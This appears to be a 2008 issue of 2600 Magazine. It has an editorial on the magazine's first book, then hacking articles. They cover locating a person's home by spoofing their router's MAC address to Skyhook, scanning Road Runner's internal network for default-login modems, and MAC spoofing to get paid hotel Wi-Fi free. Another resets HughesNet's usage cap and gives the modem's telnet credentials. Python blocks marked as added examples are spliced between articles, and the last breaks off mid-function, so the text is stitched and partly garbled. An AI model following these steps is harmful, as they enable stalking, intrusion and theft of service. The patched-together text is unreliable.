The Best of Times


Don't "Locate Me"
Exploring Road Runner's Internal Network
Hacking Wireless Networks with Windows
The HughesNet FAP
TELECOM INFORMER
Hacking Society
Thirteen Years of Starting a Hacker Scene
HPing (The Part I Forgot)
Meditation for Hackers: All-Point Techniques
Fun with Network Friends
Hacking: A Graffiti Writer's Perspective
HACKER PERSPECTIVE: Barry Wels
A Portable Encrypted Linux System for Windows
Mac Address Changer
Capturing Botnet Malware Using a Honeypot
LETTERS
Cracking with the Webtionary
JavaScript Password DOMination
Spirits 2000 Insecurity
TRANSMISSIONS
The Geek Squad
Bank of America Website Flaw
Why is This Computer Connected to the Internet?
Story: Message of the Day
MARKETPLACE
MEETINGS

The Best of Times

History is something that we're always living but rarely appreciating. This year, all of that changed for us. We got the incredible opportunity to truly acknowledge the significance of the changing trends and technologies that we have been witnessing since 1984. And now we're ready to share what came out of it all.

We're happy to announce the publication of our first-ever book: The Best of 2600: A Hacker Odyssey. When we were first approached with the idea for this project, it seemed a daunting task. And it was. After all, how could we possibly pick and choose from 24 years of publishing? And how would such a collection be ordered? The almost infinite amount of themes and subject matter we've gone through in so many issues made this seem like something we could never pull off.

So our biggest challenge was getting this massive amount of articles into some sort of order. After much brainstorming, we found the answer to be staring us in the face the whole time. What we've witnessed throughout all of our pages spans three very distinct decades: the 1980s, the 1990s, and the post 2000 period. And that is how we decided to divide the book. By decade. In so doing we quickly discovered that there was a very noticeable change of mood and tone when looking at such periods as cohesive units and then comparing them to each other.

For example, the 1980s was filled with a sense of wonder as so many new things were starting to come into play. The Bell System was being torn apart. Computers were becoming more and more popular and being found increasingly in the home. Hackers were among the first to figure it all out, finding ways of shaping the technology to their needs, and, naturally, getting into a load of trouble for their efforts. But there was still this link to the past, where mainframes dominated and phone phreaks lived in fear of arousing the ire of Ma Bell.

The 1990s was a period of growth where both telecommunications and the concept of the Internet soared into the stratosphere. Suddenly, everyone seemed to be following this stuff and the hacker world felt the effects in both good and bad ways. Having more people getting involved was certainly nice. But all of the attention was a royal pain in the ass. Hackers had always been looked upon with suspicion and paranoia but now it had graduated to genuine fear and the desire to put certain offenders behind bars. We saw that happen too many times. The dot-com boom turned many of our friends into very rich people and that tended to put all sorts of values on a collision course. And of course, this was the decade that the media really jumped into the fray. There were books and movies about hackers galore. Again, a bit of fun and a bit of a pain.

Then came 2000 and beyond. The world in this period seems to have gotten so much more serious. Everyone appears obsessed with security and convinced that everyone else is out to get them in one way or another, whether it be by stealing their identity or blowing them to smithereens. The net has become a fixture in our daily routines, speed and storage just keep increasing on a continual basis, and communicating has never been easier. But somehow, the innocence of our past seems to have been diminished. To many, the simple romance of playing with new technological toys is noticeably lacking and technology has become more of an assumed fact of our everyday lives. It's actually become easier for many of us to stay connected than to try and disconnect.

Page 4, 2600 Magazine

In each of these distinct periods, we found there to be one remaining constant. The hacker culture has remained true to its beliefs and largely unaffected by the changing world around us. If you look at one of our articles from our early days and compare it to something from this issue, you'll notice that, while the technology is completely different, the spirit behind the writing has more or less remained the same. It's always about asking questions, performing all sorts of experiments, theorizing, and, above all else, sharing the results with the rest of us. Throughout all of the change and turmoil, this much has remained.

Once we realized that we had these three unique decades and a common thread that ran between them, it was just a matter of picking the stories that best summed up what was going on at the time. As it turned out, this was another daunting task. There were just so many fascinating pieces that have gone into our pages over the years that it became painful to decide which ones would be included and which would have to be left out. And even after we had done a whole lot of cutting and trimming, it was all too clear that we just had an overabundance of material. Trying to fit it into a 360 page book would be next to impossible. In fact, just the 1980s could have easily filled the entire page allocation if we had let it.

Fortunately, our publishers had the good sense to lobby for a dramatic increase in size for the book and we found ourselves with a limit that was over 600 pages instead. As the months went on, this wound up being increased once more to nearly 900 pages! Apparently, the publishers had just as difficult a time figuring out what to cut as we did. What better endorsement could we possibly ask for?

In the end, we wound up with a pretty neat collection of some of what's been going on in the hacker world in the last quarter century. While it's titled The Best of 2600, there are still lots of good pieces that didn't make it in for one reason or another. But we believe that if you look at all of the pieces that are included, you'll get a pretty good sense of what's been happening in our unique world since our first issue in 1984. (In fact, the very first article in our very first issue ended with the sentence: "Turn the page and become a part of our unique world.")

We want to thank the many readers who have been suggesting something like this for years. We do listen to these suggestions and we're happy that the opportunity presented itself where we could actually bring these ideas to fruition. We also want to thank Wiley Publishing and the many people over there who have worked with us on this project since it began last year. We now have something which will make a good deal of our material a lot more accessible, not only to our existing readers but to a vast number of others who have never even heard of 2600 and whose only perception of what hackers are about comes from the mass media. This is a tremendous opportunity to have our voices heard in whole new arenas and to open some doors in what others only see as walls.

And for many of us, this will be an amazing trip down Memory Lane. We tend to forget all of the magic of the past and the significance of the differences in the way things used to work, both big things and little things. An era when something like Caller ID was seen as extremely controversial, when packet switched networks were all the rage, when pagers were far more prevalent than cellular phones, when sending electronic mail between different computer systems was a really big deal. It's one thing to simply remember those days, quite another to immerse yourself in the words and emotions of the time period. What's most amazing to us is how relevant it all is, even when the technology is almost unrecognizable. And for those of you who weren't even alive back then, there is no better way to get a true sense of the history that we all know is out there somewhere.

The Best of 2600 will officially be released at The Last HOPE conference and will be available thereafter all over the world. We doubt there will ever be a book with this much information about the hacker world crammed into so many pages. But we certainly do hope to see a lot more hacker-related books and an overall increase in the interest level stemming from all of this. Because one thing we learned from going through every article we ever printed, apart from being utterly captivated by some of the stories, is that this stuff really does matter.

Summer 2008, Page 5

Don't "Locate Me"
by Terry Stenvold
thebmxr@gmail.com

Disclaimer
This article is for educational purposes only. Check local laws before attempting anything. The author holds no responsibility for the use or misuse of this information.

General Information
As you may know, there is a new feature included in the Google Maps 1.1.3 update for the Apple iPhone and iPod Touch: the "Locate Me" feature. The new feature is provided by another company called Skyhook Wireless (http://www.skyhookwireless.com/). Skyhook's system is named WPS, for Wireless Positioning System, and locates users by knowing the location of their wireless aperforms their location features in a unique way because WPS requires knowledge of the specific geographical location of individn and locate access points, and they then append this information to a large reference database. The problem with the system, other than knowing someone has driven by your house or business and added your AP's information to a large database, is that a third party can then locate you with only your MAC address. I recently emailed Skyhook and asked if there is a way for people to lotabase besides unplugging the access point.

This article will provide evidence contradicting both answers provided by Skyhook. It will also explain how someone with malicious intent could possibly discover your location.

Requirements
To run these scripts, you'll need a Linux computer with an ethernet connection and a wireless card capable of master mode; an iPhone, iPod Touch, or any other mobile device with the "locate me" feature; the MAC address of your victim; and an isolated area where no access points have been located and added to Skyhook's reference database.

Scripts
There are two scripts in this system. skyhack.sh will create a bridge between the ethernet and wireless card to create an AP environment. You can also use two wireless cards, but the AP broadcasting must be unmarked by Skyhook, which would require editing the scripts. delbr0.sh destroys the bridge, which returns your computer to normal.

Step 1: Gaining the MAC address of a victim
The process of acquiring a MAC address is beyond the scope of this article, but I will provide some general ideas as to how to do it. Wireless router packaging often displays the MAC address on the outside of the box, so sales personnel at an electronics store could easily write down the MAC address and keep that information until the product is sold. This is fairly useless, because the MAC address can be cloned during the setup of a wireless router, which would then change the address, rendering the original information obsolete. Another way to acquire a MAC address is via social engineering. This is accomplished by conning an individual into divulging their MAC address. Google is another source that can be used to obtain MAC addresses. Some people post their MAC addresses while seeking help in a forum to solve a problem. Gaining access to a computer through a Trojan horse and running the command "arp -a"

Step 2: Setting up your computer
The basic idea is to make your computer into an AP that spoofs the victim's MAC address. The way we do this is to bridge the ethernet cable and wireless card. The wireless card will then act as the access point of the spoofed victim. To run the bridging script, run this command from the console: ./skyhack.sh 00:00:00:00:00:00. You need to change the MAC address to the twelve-character MAC address of the victim. Your connection will then be bridged, and the router's DHCP server will hand out an IP address to your mobile device when connected.

Step 3: Finding the approximate location
When you go to your mobile device, you should see the SSID "skyhack." Connect to this "skyhack" network. To ensure that your connection is working properly, check that your IP address is not in the 169.254.0.0 address block. Your web browser should then be used to load a website to guarantee that you are receiving internet traffic. If this works, you are now ready to connect to Google Maps and use the "locate me" feature. Make certain there are no other APs around; if there are, be sure that they are not in Skyhook's database, as they can affect your results. By using the "locate me" feature, you should now be able to see the victim's approximate location within a 100m-200m diameter.

Step 4: Locating victims' exact locations
Use Google Maps to give you driving directions to the approximate location given. To return your computer to normal, run ./delbr0.sh. This removes the bridge between your ethernet and your wireless card. It also returns your wireless card to managed or default mode. Now, drive to the approximate location, and scan the local area with your laptop or mobile device for the specific MAC address in question until the location is pinpointed.

Prevention
To prevent these types of security breaches, keep your software patches up-to-date and use virus and malware scanners to prevent intrusion by others who may then acquire the MAC address of your router. Also be wary of technical helpers over the phone or over the Internet who ask for your MAC address. A more definite way to prevent intrusion is to use the "Clone MAC" feature that can be found on most router configuration pages. This is primarily used to prevent the ISP from blocking internet access to your newly acquired hardware, making it so that only your PC can access the internet. This tool can also be used to change the MAC address so that it will point intruders to nowhere or will point them to someplace completely different. Always check that the newly changed MAC address is not similar to a neighbor's. With Skyhook claiming that it is not possible to remove single APs from their database, this is the best method, as long as you change the MAC often.

This method of locating has been tested with access points around my local area and also with a friend who lives almost 8000 km away. Please note that this "attack" is only as accurate as Skyhook's database.

As a side note, these types of attacks could be used to tell friends your home address. Instead of telling them that the address is "2600 Robert Street," you could say, "I am living at 00:00:00:00:00:00."

Notes
The scripts provided in this article will not work out of the box with any wireless card or ethernet adapter unless the interfaces are named ath0, wifi0, and eth0. In most other cases, a simple change from ath0 to eth1 or wlan0 is all that is needed. Using different routers will also require different IP ranges. For example, Dlink routers would use 192.168.0.5 instead of 192.168.1.5.

Exploring Road Runner's Internal Network
by Tim

Most ISPs require you to have a modem of some sort. For broadband cable, this is usually a DOCSIS (Data Over Cable Service Interface Specifications) compatible device, version 1.0, 1.1, 2.0, or 3.0, depending on your ISP's needs. This device is essential to cable internet as it isolates and uses the various frequencies on the cable line which have been reserved for internet service. All of this information is determined by your ISP and is delivered to the cable modem via tftp from some server on your ISP's non-public network. Your cable modem has a MAC address like any other network device, and it is usually this that the ISP uses to authenticate you to the network. The CMTS (Cable Modem Termination System) is where the transition between cable and fiber happens, for those that are interested. At any rate, once your device is determined to be legitimate (again, the method is determined by the ISP, but is most likely the MAC address), you are leased a public IP address. There is also an internal IP address granted to the modem, and it usually resides somewhere in the 10.x private subnet. This address should never be accessible either from your own computer or by anyone else that isn't correctly authenticated on the network. This is to prevent various horrible things from happening, such as the use of one of the many in-band configuration methods for routers and switches that reside on the networks. Most devices decide who should be able to access the device remotely only by seeing which network they reside on. If you access the 10.x side of the device, the odds are good that you'll be allowed access at least at the same level as the ISP. Simple enough. Now, once your device is given the correct network configuration, it then forwards those settings onto your computer. If you are not using a router or some middle-man appliance, then your computer will inherit the TCP/IP configuration, allowing you to access the internet at large.

The cable modem is essentially doing very simple routing for your computer. It is simply taking everything given to it and pushing it through the other side in accordance with the ISP's settings. This is how it was intended to be. The cable company can terminate your connection by sending a series of commands to the device. It can similarly throttle your connection, do troubleshooting, and so on. They do this either by using proprietary tools such as Orion, which has some phenomenal CMTS tools, or by using in-house tools, usually PHP, ASP, or Perl scripts running on some machine that manages the network. (See the resources at the end of this article for some interesting sites on the Road Runner network). From there, they can do all sorts of stuff, but the important thing to remember is that they are not using your public IP address to do this; they are using the private IP address given to your modem. This is where my story begins.

I was sitting in my office, configuring my router to support the addition of a couple more subnets in the 10.0.0.0/24 range. As I was doing this, I decided that the easiest way to test for connectivity among the various subnets was to simply allow all traffic on the 10.0.0.0/8 network to pass to any of the other subnets. So, I set all this up and let some ICMP traffic fly across the wires. This is where it got interesting.

I typed an IP address incorrectly. To be specific, I typed 10.0.0.10 and pressed enter. Knowing that this IP address would not be found on my network I went to Ctrl+C the command. What did I see appear on my console? "Reply from 10.0.0.10: bytes=32 time=76ms TTL=128." My first thought was that someone had penetrated my network and established an entire subnet without me noticing. Then I saw the latency and decided to do a traceroute. Sure enough, the trace passed through my router, through the ISP provided modem, and over the Road Runner network, eventually coming to a stop at some poor soul's Ambit Cable Modem.

Admittedly, I was very curious, so I ran some simple nmap commands and discovered that this device was listening on port 80. So, I loaded Firefox and hit the device with HTTP. Sure enough, I saw the cable modem's management screen. Being the concerned citizen that I am, I tested the login to make sure the defaults had been changed. Much to my surprise, I could log in and get full viewing and configuration access with username and password "user." I then had admin access to someone's cable modem, complete with an internal IP address range on Road Runner's network, the public IP address, the MAC address, and everything else needed to clone their cable modem and steal their service. From the screen which came up, you can restart the device, reset it to the factory defaults, or do pretty much anything you want. My mind boggles at the concept. And this is just 10 addresses into a 16 million host subnet. I immediately powered up nmap with OS fingerprinting and version scanning with the target network of 10.0.0.0/8. I watched as the log file grew from 1k to 10k to 100k to 1000k. After a couple of hours, I had a 5MB file, full of cable modems running HTTP, SSH, telnet, and various other services, all of them using default logins and passwords. Most of them are running vulnerable versions of SSH, and all of them will fall back to SSH1, which means that any passwords that may be in place protecting the shell access are useless.

I suddenly realized that Road Runner might notice all of the scanning that I was doing, so I called up Road Runner tech support and asked to speak to someone in the security department. They put me on hold, and I listened to crappy music for about ten minutes before someone finally picked up. We will call him Bill.

"Hello, thank you for calling roadrunner technical support. My name is Bill, how can I help you?"

"Hi, Bill. My name is Tim. I'm just calling to report some strange behavior on your network. It seems that I am able to see some of your internal IP addresses. I can access your entire class A subnet as if it were public."

"Oh... hold on a minute. I have to make a call."

I was then put on hold for about twenty minutes. Eventually Bill returned, with an edge of concern in his voice.

"Can you give me some more information about this? What addresses are you seeing? What do you think is allowing you to do this?"

"Well, any IP address on the Road Runner network that starts with 10 is visible to me. There don't seem to be any restrictive measures in place or anything, Bill. As for how this has been happening, I'm not sure."

"Okay, do you see any other private IP addresses, anything like 192?"

"Doesn't seem like it, Bill, but I haven't really looked either."

"How are you seeing these IP addresses? Are you using a packet sniffer or something?"

At this point, I realized that he was very concerned and that he was fishing for information. I told the truth, as I don't want to go to jail for terrorism or some other equally absurd reason. (Hooray for abusive and unconstitutional laws!)

"I'm just using nmap to scan the subnet, no packet sniffers or anything. So, yeah, I'm actually very concerned about this. If I can see these internal IP addresses, it means that I can sniff traffic off the network as well, Bill. I don't like that. If I found this by mistake, someone out there will certainly find it as well. I mean, if I were malicious, I could cause some serious damage. These devices have default admin logins. Oh, and the guy at 10.0.0.10 is having network issues."

"Really?" He chuckled nervously. "Well, hold on a minute. I have to make a call."

I waited on hold again, this time for only a couple of minutes.

"Alright, the security specialists say that this is normal for the network. Since you're a part of the network, you should be able to see the other machines, so it's okay. You're on a business account and, since you have a static IP, you are able to see some things that most of our customers cannot. I'll make some notes on your account so that it's clear that you mentioned this to us and were concerned. You might get a call from the Road Runner security department sometime in the future. Is there anything else?"

The conversation ended with the standard scripted closing, and I hung up the phone.

Normal operational behavior? An entire internal IP address range available publicly? I could see not just an entire subnet, but the entire 10.x network, the entire Road Runner network. I decided to test Bill's theory about the business connection. I SSHed into my Linux box at home and issued a ping to 10.0.0.10. Sure enough, it responded. So, everyone on the Road Runner network can simply use this private IP range to access network equipment. I quickly loaded up nmap and continued the scan.

At this point in time, I had found several thousand modems, nearly all of them running
webservers, many of them also running SSH and telnet. I also found several cable modems acting as routers. If someone were to log into one of those devices, it wouldn't be hard to set up forwards into the NATed network or to forward all their traffic through a tunnel to some other PC. The possibilities then would be nearly limitless: hijacking VoIP service by cloning their hardware, stealing internet service by cloning the MAC address, changing settings, or redirecting the location of the default DOCSIS servers, among other things.

As far as ISP-level equipment goes, Road Runner's DHCP servers, DNS servers, and network monitoring services are all available for scanning. Worse, nmap's version reporting option (-sV) shows version numbers for the services running. Many of these are reported correctly, and several of them are vulnerable to very well-known exploits. For instance, on one particular server the SSH daemon is set to roll back to SSH1 if the client doesn't support SSH2. Aside from all of that, a quick scan of the log file reveals the type of IDS they're using, the type of network monitoring software they're using, strange and unneeded third party applications such as screencast, and other pieces of information, all freely available. Honestly, I don't imagine that it would take a skilled hacker more than an hour or two to successfully compromise the systems. The servers are pretty homogeneous, apparently consisting mainly of Linux servers running essentially the same applications, so the odds are good that if you can compromise one system, then you can take the rest as well. Also, each system seems to be a central IDS reporting center, most likely for whatever section of the network it controls, and syslog information is forwarded to those machines. The information that could be gleaned from the log files alone would be worth its weight in gold.

Of the 25,000 or so devices that showed up, about 100 of them seemed to be ISP servers. I stopped scanning after about 12 hours because I felt like I had seen enough, but anyone who were to scan the entire 10.x subnet would undoubtedly discover much more than I have.

Needless to say, the potential for abuse here is tremendous, and it's shocking that this kind of network behavior was ever engineered to begin with. Under normal circumstances, their routers and firewalls should filter public requests for private IPs, but I guess this isn't being done.

I guess it's true what they say about corporate networks: hard on the outside, gooey on the inside.

One final note: There are interesting sites at tools.location.rr.com, where location is your geographical region, usually pretty easy to figure out. For example, the Tampa, Florida area is http://tools.tampabay.rr.com. The login and password have recently changed, but these sites contain all the information needed to hijack someone's account or to change most, if not all, of the services attached to the account. Pretty slick stuff.
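
The filtering the Road Runner article expects from the ISP's routers and firewalls, as an added example that is not from the article or from Road Runner: a first-match packet filter evaluated over constructed flow records, with a permit-everything rule set beside one that keeps subscriber traffic out of the 10.0.0.0/8 modem management range, plus a count of how many management addresses each source touched. The subscriber prefix (a documentation range), the rule sets, the flow records and all function names are assumptions.

```python
"""First-match packet filter on a subscriber-facing interface (added example)."""
import ipaddress
from dataclasses import dataclass

ANY = ipaddress.ip_network("0.0.0.0/0")
MGMT_NET = ipaddress.ip_network("10.0.0.0/8")             # management range named in the article
SUBSCRIBER_NET = ipaddress.ip_network("198.51.100.0/24")  # constructed subscriber public range


@dataclass(frozen=True)
class Rule:
    action: str                    # "permit" or "deny"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network


# Behaviour the article observed: nothing stands between subscribers and 10.x.
WEAK_ACL = [Rule("permit", ANY, ANY)]

# Assumed corrected policy for traffic arriving from subscriber premises.
HARDENED_ACL = [
    Rule("deny", ANY, MGMT_NET),          # subscribers never reach management addresses
    Rule("permit", SUBSCRIBER_NET, ANY),  # valid subscriber sources reach the internet
]                                         # anything else falls through to the implicit deny


def decide(acl, src, dst):
    """Return the action of the first matching rule; no match means deny."""
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for rule in acl:
        if src_ip in rule.src and dst_ip in rule.dst:
            return rule.action
    return "deny"


def management_exposure(acl, flows):
    """Flows the ACL would forward into the management range."""
    return [(s, d) for s, d in flows
            if ipaddress.ip_address(d) in MGMT_NET and decide(acl, s, d) == "permit"]


def scanning_sources(flows, threshold=5):
    """Sources that touched at least `threshold` distinct management addresses."""
    touched = {}
    for s, d in flows:
        if ipaddress.ip_address(d) in MGMT_NET:
            touched.setdefault(s, set()).add(d)
    return sorted(s for s, dsts in touched.items() if len(dsts) >= threshold)


# Constructed flow records (source, destination) seen on the subscriber side.
FLOWS = (
    [("198.51.100.23", "10.0.0.10"),      # the mistyped ping from the article
     ("198.51.100.23", "203.0.113.80"),   # ordinary web traffic
     ("192.168.1.20", "203.0.113.80")]    # un-NATed private source, invalid here
    + [("198.51.100.77", f"10.0.0.{host}") for host in range(1, 7)]  # one source, six targets
)

if __name__ == "__main__":
    for name, acl in (("weak", WEAK_ACL), ("hardened", HARDENED_ACL)):
        print(name, "forwards into 10/8:", len(management_exposure(acl, FLOWS)))
    print("sources sweeping 10/8:", scanning_sources(FLOWS))
```

The hardened rule set applies only to packets arriving from subscriber premises; modem provisioning and operator access are assumed to use other interfaces and are not modelled.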

Hacking Wireless Networks with Windows
by Carbide

First, the necessary disclaimer: gaining unauthorized access to wireless networks, especially when someone wants you to pay, is probably illegal. This article is provided for information only.

I was recently on a business trip, and I took the company-provided Windows laptop with me. The hotel I was staying in had Wayport wireless access [1] for a fee. Opening up Firefox took me to the page that explains the pricing and service. The hotel I was in happened to have only unlimited plans, which I'll explain later. My friend once told me that he had read in 2600 a way to gain access to wireless networks by MAC address spoofing in Linux. He basically described that you find other computers on the wireless network, then find their MAC addresses, then change your MAC address to match theirs. Once this is done, the wireless router routes every other packet to your computer. The way it was described, the wireless router thinks both computers are one computer because they have the same hardware address.

Not having Linux with me at the time, I made sure I had two very important programs: Kaboodle [2] and Technitium MAC address changer [3]. First, I connected to the wireless access point of interest and opened up Firefox to ensure that the correct page was displayed. Second, I opened up Kaboodle and waited for every computer on the network to be scanned. This may take a while if the network is really busy. Then, the computers were displayed; some are shown as computer names like NANCY, others as IP addresses. Double clicking on one of them shows the computer's MAC address:

[Screenshot: Kaboodle]

The n ext step i s to change your MAC
address to t he on e t hat i s di s pl ayed. There
are severa l ways to do t hi s i n Wi n dows.
On e way t hat I'm fami l i ar wi t h i s to edi t t he
regi stry to change t he address, but I prefer
t he Techn i t i um MAC address changer for
frequent changes. Open u p t h i s program,
a n d change t he MAC address to t he on e
t hat i s di s pl ayed by Kaboodl e:
The wi rel ess card s hou l d be d i s abl ed
a n d t hen re-en abl ed, a n d then it s hou l d
recon n ect t o t h e n etwork of i nterest .
Navigate to your homepage and it should display. Some problems that might be encountered are slow page load times, frequent disconnects and reconnects to the access point, and a complete inability to access the AP at all. I encountered slow page load times. This might be attributed to both computers trying to access a lot of information at one time or downloading or uploading large amounts of data. If this happens, changing to a different MAC address might be useful. The second problem might be the router trying to defeat this method, detecting two identical MAC addresses, and not allowing either to connect. The third problem might be that the router has detected one MAC address first and will not allow an identical one to connect because it has already associated.
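From the network operator's side, the symptoms listed above (reconnect churn, one hardware address behaving like two machines) are what a detector can key on. The following is an added example, not code from the article or from any product it names; the log format, event names, thresholds and addresses are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log in a hypothetical "timestamp EVENT mac [host=NAME]" format.
SAMPLE_LOG = """\
2008-06-01T21:00:05 ASSOC 02:00:00:aa:bb:01
2008-06-01T21:00:07 DHCPREQUEST 02:00:00:aa:bb:01 host=NANCY
2008-06-01T21:05:12 ASSOC 02:00:00:aa:bb:02
2008-06-01T21:05:13 DHCPREQUEST 02:00:00:aa:bb:02 host=FRONTDESK
2008-06-01T21:30:10 ASSOC 02:00:00:aa:bb:01
2008-06-01T21:30:11 DHCPREQUEST 02:00:00:aa:bb:01 host=TRAVEL-LAPTOP
2008-06-01T21:31:02 ASSOC 02:00:00:aa:bb:01
2008-06-01T21:32:15 ASSOC 02:00:00:aa:bb:01
2008-06-01T21:33:40 ASSOC 02:00:00:aa:bb:01
2008-06-01T21:35:13 DHCPREQUEST 02:00:00:aa:bb:02 host=frontdesk
"""

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<event>ASSOC|DISASSOC|DHCPREQUEST) "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})(?: host=(?P<host>\S+))?$",
    re.IGNORECASE,
)


def find_shared_macs(log_text, flap_limit=4, flap_window=timedelta(minutes=5)):
    """Return {mac: [reasons]} for addresses that look shared by two devices.

    hostname-conflict: one MAC sent DHCP requests under different hostnames.
    assoc-flapping:    flap_limit or more associations inside flap_window,
                       the reconnect churn two stations on one address cause.
    """
    hostnames = defaultdict(set)      # mac -> hostnames seen in DHCP requests
    recent_assoc = defaultdict(deque)  # mac -> association times in the window
    findings = defaultdict(set)

    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # ignore lines that are not in the expected format
        ts = datetime.fromisoformat(m["ts"])
        event = m["event"].upper()
        mac = m["mac"].lower()

        if event == "DHCPREQUEST" and m["host"]:
            hostnames[mac].add(m["host"].upper())  # hostnames compare case-blind
            if len(hostnames[mac]) > 1:
                findings[mac].add("hostname-conflict")
        elif event == "ASSOC":
            window = recent_assoc[mac]
            window.append(ts)
            while ts - window[0] > flap_window:
                window.popleft()  # drop associations older than the window
            if len(window) >= flap_limit:
                findings[mac].add("assoc-flapping")

    return {mac: sorted(reasons) for mac, reasons in findings.items()}


if __name__ == "__main__":
    for mac, reasons in find_shared_macs(SAMPLE_LOG).items():
        print(mac, ", ".join(reasons))
```

The DHCP hostname is supplied by the client, so a dual-boot machine can trip the hostname rule; treat a hit as a lead to check against the access point's own association records.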
Several moral and ethical problems might be considered. For example, if this is not an unlimited plan, then each byte might cost the customer money. Common courtesy would dictate that you make sure you're using an unlimited plan. Also, if the user suspects that activity has been going on when they were not using the service, it might raise some questions. Another potential problem would arise if the customer gets randomly kicked off; they might call technical support to investigate, which could further complicate matters. The last moral dilemma is charging for wireless access in the first place, which should put people at unease, but, surprisingly, doesn't. One problem with this is charging for a substandard service when other services are available that people would have no objection to paying for, such as ethernet and fiber optic connections. The other problem with charging is that offering free wireless access attracts customers to whatever service you are offering, whether it's staying at a hotel or getting a cup of coffee. I apologize for the digression and for any disagreeing letters that might follow.
References
¹ http://www.wayport.net/
² http://www.kaboodle.org/
³ http://tmac.technitium.com/tmac/
Thanks: Droid for telling me about this method and the author of the 2600 article about it.
The HughesNet FAP
by ntbnnt
I use satellite Internet, which is great for web browsing, IRC, IM, e-mail, and the like. But it offers absolutely no convenience whatsoever for downloading music, listening to internet radio, or downloading my favorite Linux distro.
You see, HughesNet has a particularly restrictive Fair Access Policy (FAP). Now, I understand perfectly why a FAP is needed; however, it seriously limits many of the more obvious and useful applications of high-bandwidth Internet.
Having the hacker's perspective, I questioned if it were possible to reset my Internet usage statistics, so that I'd be able to take the 2.5 hours of non-stop HTTP communication that it takes to download an .iso of Debian without having to wait 24 hours after each hundred megabytes.
The equipment for a HughesNet connection is a satellite dish, its radio, and a receiver, or modem if you will. The modem is a basic VxWorks-based router with only one port and the equipment and software to interpret the satellite signal. You can telnet into this router by connecting to 192.168.0.1:23 and entering the username brighton and the password swordfsh. Anyone with experience hacking VxWorks equipment should find a new toy instantly with that information. But, onward to the FAP issue.
There is a separate telnet daemon running on the HughesNet modem. It is listening for the free-minded to call upon its power at 192.168.0.1:1953, and Hughes made it easy for us, since we can access this menu without any kind of login. Basically, this is the CLI of what you get by visiting http://192.168.0.1, but it provides some much more useful functions. Entering ? into the command prompt will yield all the info we will need.
The HughesNet FAP is enforced by tracking the bandwidth used by each Site ID. If you've never done so before, go to System Info to see this. Basically, it serves as authentication that your modem is commissioned for service. If you have no Site ID, access to the HughesNet network will not be granted. Now, basically the goal is to reset all of the information stored about you at the HughesNet NOC, so your FAP status is reset back to nil. That will allow you to finish the download of Debian, RedHat, or whatever you prefer.
So, we will need the help of tech support. This is fine, because tech support is your friend. Reconnect to your router and enter the command rd. This is going to force your modem into a state of being decommissioned, which will require it to be recommissioned with the help of tech support. Go ahead and call 1-866-347-3292. Give them all the info they need; be honest.
The agent will not check your FAP status - it's simply not in the script. He will tell you to go to http://192.168.0.1/fs/registration/setup.html and click "Re-Register." Continue through the prompts until the modem reboots. After it does so, let it sit, watch the status at http://192.168.0.1, and let it update. When it's done updating, go ahead and check the FAP status. It should now say "NO." That means sweet, unmetered freedom. Smile and watch as your connection goes from 2.2 kb/s to 200.2 kb/s, and smile bigger with that nice fat download sitting in your download folder. Redo this as needed, but remember to call tech support every few times that you need to do it; that way Hughes will see that there are issues with your service and that you aren't decommissioning your modem for fun.
Shouts to h3xis, who taught me about firmware, showed me how to hack Tomato, and introduced me to 2600.
Hello, and greetings from the Central Office! After an unusually cold and rainy winter here in the Pacific Northwest, summer is in full swing. With so little good weather in this part of the world, people head outdoors and make the most of it - even with gasoline hovering near $5 per gallon.
For many young people, this means it's time for noisy outdoor concerts, which I'm told are even louder than our diesel backup generator here at the Central Office. At a huge music festival with sound systems approaching the decibel level of a 737 taking off, how do you find your friends? Increasingly, text messages are the solution.
You may not think about it much when you're sending "HEY CRACK DAWG WHERE U" to your friend, but sending and receiving small text messages is incredibly complex - in fact, much more complicated than email. Making matters worse, there are multiple versions of SMS, and multiple technologies involved in mobile phone systems (for example, CDMA IS-95, CDMA2000, GSM CSD, and GSM GPRS). For this article, I'll focus on GSM networks, which are operated by AT&T and T-Mobile (along with some smaller regional carriers such as Edge Wireless) in the U.S.
Text messages are governed by the Short Message Service (SMS) standard. This is currently defined as part of the European Telecommunications Standards Institute (ETSI) GSM 03.38 standard. It incorporates, by reference, the MAP part of the Signaling System 7 (SS7) protocol. The specification allows for 140 byte messages. In North America, this translates to 160 characters because the character set used is limited to 7-bit ASCII characters. In Unicode alphabets (such as Arabic, Chinese, or Cyrillic), where characters are two bytes apiece, SMS messages can only be 70 characters in length. Whichever alphabet you use, larger messages are generally split apart to be delivered (and billed) as multiple text messages. However, because additional metadata is required to accomplish this, the size of each message is reduced by six bytes (seven ASCII characters).
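The size arithmetic in the paragraph above can be checked by packing 7-bit characters into octets and counting parts. This is an added example, not code from the article; the function names are hypothetical, and the 7-bit path assumes the message uses only characters whose GSM 03.38 code equals their ASCII code (letters, digits, space and common punctuation).

```python
import math

PAYLOAD_BYTES = 140  # user data per SMS, the figure the article gives
CONCAT_HEADER = 6    # bytes the article says each part loses when a message is split

# Assumption: only characters whose GSM 03.38 code equals their ASCII code.
SAFE_7BIT = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    " !\"#%&'()*+,-./:;<=>?\r\n"
)


def pack_septets(text):
    """Pack 7-bit characters into octets, low bits first, as GSM handsets do."""
    acc = 0      # bit accumulator
    nbits = 0    # number of valid bits currently held in acc
    out = bytearray()
    for ch in text:
        if ch not in SAFE_7BIT:
            raise ValueError(f"{ch!r} is outside the 7-bit subset used here")
        acc |= ord(ch) << nbits
        nbits += 7
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    if nbits:
        out.append(acc & 0xFF)  # final partial octet, zero padded
    return bytes(out)


def plan_sms(text):
    """Return (encoding, characters_per_part, parts) for a message.

    A message that fits in one SMS uses the whole 140-byte payload; a longer
    one is split and every part gives up CONCAT_HEADER bytes.
    """
    if all(ch in SAFE_7BIT for ch in text):
        encoding, bits, units = "7bit", 7, len(text)
    else:
        encoding, bits = "ucs2", 16
        units = len(text.encode("utf-16-be")) // 2  # two-byte code units
    single = PAYLOAD_BYTES * 8 // bits               # 160 or 70
    if units <= single:
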